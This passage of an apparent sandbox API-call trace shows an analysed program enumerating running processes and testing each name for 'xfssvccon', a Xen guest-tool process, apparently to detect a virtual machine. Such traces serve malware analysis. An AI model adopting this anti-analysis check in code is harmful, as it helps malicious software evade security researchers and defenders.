lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.828] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568a30 [0093.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.828] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.829] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.829] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568ce8 [0093.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3568ce8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.830] StrStrIA (lpFirst="taskhostw.exe", lpSrch="xfssvccon") returned 0x0 [0093.830] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.846] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568af0 [0093.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3568af0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0093.928] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0093.928] StrStrIA (lpFirst="explorer.exe", lpSrch="xfssvccon") returned 0x0 [0093.928] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0093.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.929] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35694a8 [0093.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35694a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0093.929] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0093.929] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="xfssvccon") returned 0x0 [0093.929] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0093.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.930] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35669a8 [0093.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x35669a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0093.930] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0093.930] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="xfssvccon") returned 0x0 [0093.930] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0093.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.932] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35696e8 [0093.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x35696e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0093.932] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0093.932] StrStrIA (lpFirst="Memory Compression", lpSrch="xfssvccon") returned 0x0 [0093.932] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0093.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.933] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x35694c8 [0093.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x35694c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0093.933] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0093.933] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="xfssvccon") returned 0x0 [0093.933] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0093.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.934] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568a60 [0093.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3568a60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0093.934] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0093.935] StrStrIA (lpFirst="SearchUI.exe", lpSrch="xfssvccon") returned 0x0 [0093.935] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0093.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.936] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35694e8 [0093.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x35694e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0093.936] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0093.936] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="xfssvccon") returned 0x0 [0093.936] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.937] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568be0 [0093.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3568be0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.937] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.937] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="xfssvccon") returned 0x0 [0093.937] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0093.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.939] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568d18 [0093.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3568d18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0093.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0093.939] StrStrIA (lpFirst="pending.exe", lpSrch="xfssvccon") returned 0x0 [0093.939] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0093.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.942] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566980 [0093.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3566980, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0093.942] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0093.942] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="xfssvccon") returned 0x0 [0093.942] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0093.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.943] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569508 [0093.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3569508, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0093.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0093.943] StrStrIA (lpFirst="swing prefer.exe", lpSrch="xfssvccon") returned 0x0 [0093.944] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0093.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.945] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566b88 [0093.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3566b88, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0093.945] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0093.945] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="xfssvccon") returned 0x0 [0093.945] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0093.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.946] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569728 [0093.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3569728, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0093.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0093.946] StrStrIA (lpFirst="nights-attending.exe", lpSrch="xfssvccon") returned 0x0 [0093.946] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0093.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.947] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568b50 [0093.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3568b50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0093.948] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0093.948] StrStrIA (lpFirst="installed.exe", lpSrch="xfssvccon") returned 0x0 [0093.948] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0093.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.949] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3566bb0 [0093.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3566bb0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0093.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0093.949] StrStrIA (lpFirst="references compounds.exe", lpSrch="xfssvccon") returned 0x0 [0093.949] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0093.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.950] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569768 [0093.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3569768, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0093.950] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0093.950] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="xfssvccon") returned 0x0 [0093.950] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0093.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.951] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569528 [0093.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3569528, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0093.952] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0093.952] StrStrIA (lpFirst="registered try.exe", lpSrch="xfssvccon") returned 0x0 [0093.952] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0093.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.953] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566930 [0093.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3566930, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0093.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0093.953] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="xfssvccon") returned 0x0 [0093.953] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0093.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.954] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568b68 [0093.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3568b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0093.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0093.954] StrStrIA (lpFirst="invite.exe", lpSrch="xfssvccon") returned 0x0 [0093.955] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0093.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.956] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568bc8 [0093.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3568bc8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0093.956] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0093.956] StrStrIA (lpFirst="idol.exe", lpSrch="xfssvccon") returned 0x0 [0093.956] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0093.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.957] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566a70 [0093.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3566a70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0093.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0093.958] StrStrIA 